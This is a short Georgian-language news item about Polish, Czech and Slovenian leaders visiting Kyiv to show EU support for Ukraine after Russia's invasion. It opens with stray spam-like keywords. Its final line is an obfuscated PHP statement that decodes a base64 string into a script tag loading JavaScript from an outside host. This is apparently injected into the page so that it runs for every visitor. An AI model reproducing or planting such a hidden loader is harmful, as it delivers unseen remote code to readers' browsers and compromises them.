gorgia
ავერსი jaluzi
პოლონეთის პრემიერ-მინისტრი მატეუშ მორავიეცკი და ვიცე-პრემიერი, ეროვნული უსაფრთხოებისა და თავდაცვის კომიტეტის თავმჯდომარე იაროსლავ კაჩინსკი, ჩეხეთის რესპუბლიკის პრემიერ-მინისტრ პეტრ ფიალასა და სლოვენიის პრემიერ-მინისტრ იანეზ იანშასთან ერთად, დღეს კიევში ჩადიან.
 
პოლონეთის პრემიერ-მინისტრის კანცელარიის ცნობით, ისინი ევროპული საბჭოს წარმომადგენლების ეგიდით უკრაინის პრეზიდენტ ვოლოდიმირ ზელენსკის და პრემიერ-მინისტრ დენის შმიჰალს შეხვდებიან.
 
ვიზიტი ორგანიზებულია ევროპული საბჭოს პრეზიდენტ შარლ მიშელთან და ევროკომისიის პრეზიდენტთან, ურსულა ფონ დერ ლაიენთან კონსულტაციით. პოლონეთის პრემიერ-მინისტრის კანცელარიის ცნობით, ვიზიტის მიზანია დაადასტუროს მთელი ევროკავშირის ცალსახა მხარდაჭერა უკრაინის სუვერენიტეტისა და დამოუკიდებლობის მიმართ. ამ ვიზიტის მიზანია, ასევე, უკრაინისა და უკრაინელებისთვის მხარდაჭერის ფართო პაკეტის წარდგენა.
 
რუსეთი უკრაინაში 24 თებერვალს, გამთენიისას შეიჭრა და მას მერე ცდილობს მნიშვნელოვანი ქალაქების დაკავებას. ომს უკრაინაში უკვე ემსხვერპლა ასეულობით მშვიდობიანი მოქალაქე, მათ შორის, 90-ზე მეტი ბავშვი.
 
1124
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");